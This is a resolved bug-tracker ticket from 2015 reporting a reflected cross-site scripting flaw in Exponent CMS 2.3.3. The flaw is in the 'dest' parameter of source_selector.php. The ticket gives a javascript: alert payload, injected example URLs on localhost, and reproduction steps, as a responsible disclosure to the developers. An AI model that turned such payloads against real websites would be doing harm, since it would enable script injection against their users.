#1278 ✓resolved
Sumit Ingole

exponent-2.3.3 in vulnerable to Reflected XSS

Reported by Sumit Ingole | March 6th, 2015 @ 02:36 PM | in 2.3.4 (closed)

Respected Authorities,

I would like to inform you that your CMS version 2.3.3 is vulnerable to Reflected XSS.

Exponent 2.3.3 CMS

Vulnerability : Reflected XSS

Reported By : Sumit Ingole @Suma Soft Pvt.Ltd pune India

URL : http://127.0.0.1/expo/source_selector.php

Parameter :dest=

Injection payload :javascript:alert(/XSS/)//

Injected URL : http://127.0.0.1/expo/source_selector.php?dest=javascript:alert(/XS...
http://127.0.0.1/expo/source_selector.php?dest=javascript:alert(doc... http://127.0.0.1/expo/source_selector.php?dest=javascript:alert(1)//

Steps:
1) Put One of the URL into Browser.
2) Load The page.
3) Click On any Text, Alert prompt will appear.

Comments and changes to this ticket

Please Sign in or create a free account to add a new ticket.

With your very own profile, you can contribute to projects, track your activity, watch tickets, receive and update tickets through your email and much more.

New-ticket Create new ticket

Create your profile

Help contribute to this project by taking a few moments to create your personal profile. Create your profile ยป

Bug Tracker for Exponent CMS

Shared Ticket Bins

People watching this ticket

Attachments

Pages